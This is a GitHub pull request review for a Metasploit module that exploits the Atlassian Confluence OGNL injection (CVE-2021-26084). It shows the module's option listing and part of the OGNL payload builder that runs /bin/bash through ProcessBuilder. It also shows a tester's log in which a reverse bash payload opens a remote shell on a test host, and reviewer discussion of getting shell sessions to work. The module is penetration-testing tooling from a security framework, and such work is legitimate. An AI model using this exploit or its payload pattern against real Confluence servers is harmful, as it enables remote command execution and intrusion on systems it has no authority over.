### PR TITLE
Add Atlassian Confluence CVE-2021-26084 exploit

### PR DESCRIPTION
**Pull request by wvu**
```
msf6 exploit(linux/http/atlassian_confluence_webwork_ognl_injection) > info

       Name: Atlassian Confluence WebWork OGNL Injection
     Module: exploit/linux/http/atlassian_confluence_webwork_ognl_injection
   Platform: Unix, Linux
       Arch: cmd, x86, x64
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2021-08-25

Provided by:
  Benny Jacob
  Jang
  wvu <wvu@metasploit.com>

Module side effects:
 ioc-in-logs
 artifacts-on-disk

Module stability:
 crash-safe

Module reliability:
 repeatable-session

Available targets:
  Id  Name
  --  ----
  0   Unix Command
  1   Linux Dropper

Check supported:
  Yes

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
  RPORT      8090             yes       The target port (TCP)
  SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
  SRVPORT    8080             yes       The local port to listen on.
  SSL        false            no        Negotiate SSL/TLS for outgoing connections
  SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
  TARGETURI  /                yes       Base path
  URIPATH                     no        The URI to use for this exploit (default is random)
  VHOST                       no        HTTP server virtual host

Payload information:

Description:
  This module exploits an OGNL injection in Atlassian Confluence's
  WebWork component to execute commands as the Tomcat user.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2021-26084
  https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html
  https://jira.atlassian.com/browse/CONFSERVER-67940
  https://attackerkb.com/topics/Eu74wdMbEL/cve-2021-26084-confluence-server-ognl-injection/rapid7-analysis
  https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md
  https://testbnull.medium.com/atlassian-confluence-pre-auth-rce-cve-2021-26084-v%C3%A0-c%C3%A2u-chuy%E1%BB%87n-v%E1%BB%81-%C4%91i%E1%BB%83m-m%C3%B9-khi-t%C3%ACm-bug-43ab36b6c455
  https://tradahacking.vn/atlassian-confluence-cve-2021-26084-the-other-side-of-bug-bounty-45ed19c814f6

msf6 exploit(linux/http/atlassian_confluence_webwork_ognl_injection) >
```

### CODE REVIEW

**Comment by wvu-r7** [comment]
Lol, thanks.

**Comment by jheysel-r7** [comment]
Test shows this is working:
```
msf6 > use exploit/linux/http/atlassian_confluence_webwork_ognl_injection
msf6 exploit(linux/http/atlassian_confluence_webwork_ognl_injection) > set LHOST 172.16.199.1
LHOST => 172.16.199.1
msf6 exploit(linux/http/atlassian_confluence_webwork_ognl_injection) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf6 exploit(linux/http/atlassian_confluence_webwork_ognl_injection) > options

Module options (exploit/linux/http/atlassian_confluence_webwork_ognl_injection):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     127.0.0.1        yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT      8090             yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       Base path
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host


Payload options (cmd/unix/reverse_bash):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.16.199.1     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Unix Command
msf6 exploit(linux/http/atlassian_confluence_webwork_ognl_injection) > run

[*] Started reverse TCP handler on 172.16.199.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Successfully tested OGNL injection.
[*] Executing cmd/unix/reverse_bash (Unix Command)
[*] Command shell session 1 opened (172.16.199.1:4444 -> 172.16.199.1:53124) at 2021-09-08 15:15:53 -0400

whoami
confluence
uname -a
Linux b1288daa9bf4 5.10.47-linuxkit #1 SMP Sat Jul 3 21:51:47 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
pwd
/var/atlassian/application-data/confluence
```

File: modules/exploits/linux/http/atlassian_confluence_webwork_ognl_injection.rb [hunk 1]
```diff
@@ -0,0 +1,155 @@
...
+
+  def ognl_payload(cmd)
+    # https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#expression-language-el---code-execution
+    # https://www.tutorialspoint.com/java/lang/class_forname_loader.htm
+    # https://docs.oracle.com/javase/7/docs/api/java/lang/ProcessBuilder.html
+    # https://docs.oracle.com/javase/8/docs/api/java/util/Base64.Decoder.html
+    <<~OGNL.gsub(/^\s+/, '').tr("\n", '')
+      '+Class.forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("js").eval('
+        new java.lang.ProcessBuilder(
+          "/bin/bash",
```
Comment (adfoster-r7) [inline modules/exploits/linux/http/atlassian_confluence_webwork_ognl_injection.rb:145]: Would `/bin/sh` work here too? 👀

File: modules/exploits/linux/http/atlassian_confluence_webwork_ognl_injection.rb [hunk 2]
```diff
@@ -0,0 +1,155 @@
...
+          ['URL', 'https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html'],
+          ['URL', 'https://jira.atlassian.com/browse/CONFSERVER-67940'],
+          ['URL', 'https://attackerkb.com/topics/Eu74wdMbEL/cve-2021-26084-confluence-server-ognl-injection/rapid7-analysis'],
+          ['URL', 'https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md'],
+          ['URL', 'https://testbnull.medium.com/atlassian-confluence-pre-auth-rce-cve-2021-26084-v%C3%A0-c%C3%A2u-chuy%E1%BB%87n-v%E1%BB%81-%C4%91i%E1%BB%83m-m%C3%B9-khi-t%C3%ACm-bug-43ab36b6c455'],
+          ['URL', 'https://tradahacking.vn/atlassian-confluence-cve-2021-26084-the-other-side-of-bug-bounty-45ed19c814f6']
+        ],
+        'DisclosureDate' => '2021-08-25', # Vendor advisory
+        'License' => MSF_LICENSE,
+        'Platform' => ['unix', 'linux'], # TODO: Windows?
```
[the remark this answers is not in the document]
Comment (wvu-r7) [reply modules/exploits/linux/http/atlassian_confluence_webwork_ognl_injection.rb:39]: Unlikely to happen in this PR.

File: modules/exploits/linux/http/atlassian_confluence_webwork_ognl_injection.rb (hunk 1 above)
Comment (jheysel-r7) [reply modules/exploits/linux/http/atlassian_confluence_webwork_ognl_injection.rb:145]: It seems `/bin/sh` works here. Though not with the payload type: `cmd/unix/reverse_bash` 

I wasn't able to get a session back when using `cmd/unix/reverse`

Though I was able to write to the tmp folder when using `cmd/unix/generic` with  CMD => `touch /tmp/derp1`

Any suggestions on how to return as session while using `/bin/sh` in the ognl payload?

**Comment by d4rk-d4nph3** [comment]
@wvu-r7 It would be nice to also have a Windows counterpart.

**Comment by wvu-r7** [comment]
@d4rk-d4nph3: Yes, but [we won't make the release cut](https://github.com/rapid7/metasploit-framework/pull/15645#discussion_r704732820).

File: modules/exploits/linux/http/atlassian_confluence_webwork_ognl_injection.rb (hunk 1 above)
Comment (jheysel-r7) [reply modules/exploits/linux/http/atlassian_confluence_webwork_ognl_injection.rb:145]: Going to leave as is in order to ensure we make the release cut

Comment (wvu-r7) [reply modules/exploits/linux/http/atlassian_confluence_webwork_ognl_injection.rb:145]: [Yes.](https://attackerkb.com/topics/Eu74wdMbEL/cve-2021-26084-confluence-server-ognl-injection/rapid7-analysis) I made a judgment call to use `/bin/bash` here, but I think I might revert it. I just need a good default payload.

Comment (wvu-r7) [reply modules/exploits/linux/http/atlassian_confluence_webwork_ognl_injection.rb:145]: @jheysel-r7: Correct, `cmd/unix/reverse_bash` is dumb and works only in `bash`.

Comment (wvu-r7) [reply modules/exploits/linux/http/atlassian_confluence_webwork_ognl_injection.rb:145]: https://github.com/rapid7/metasploit-framework/pull/10031#issuecomment-389286752

**Comment by jheysel-r7** [comment]
# Release Notes

This adds an exploit module targeting an OGNL injection vulnerability (CVE-2021-26084) in Atlassian Confluence's WebWork component to execute commands as the Tomcat user.

**Comment by jheysel-r7** [comment]
Awesome work on this @wvu-r7

**Comment by schierlm** [comment]
It makes me feel sad that this beautiful exploit which appears to be able to inject arbitrary Rhino/Nashorn scripts is used only for a UNIX command stager... Windows support would be nice, ARCH_JAVA support would be nicer. Sadly no time to try adding it myself.

**Comment by wvu-r7** [comment]
While this _technically_ isn't my day job anymore, I have some free time now, so I'm adding Windows support, at least. See https://github.com/rapid7/metasploit-framework/pull/15645#issuecomment-915545118 for why we had to ship this early. Release goes out Thursday.

**Pull request merged**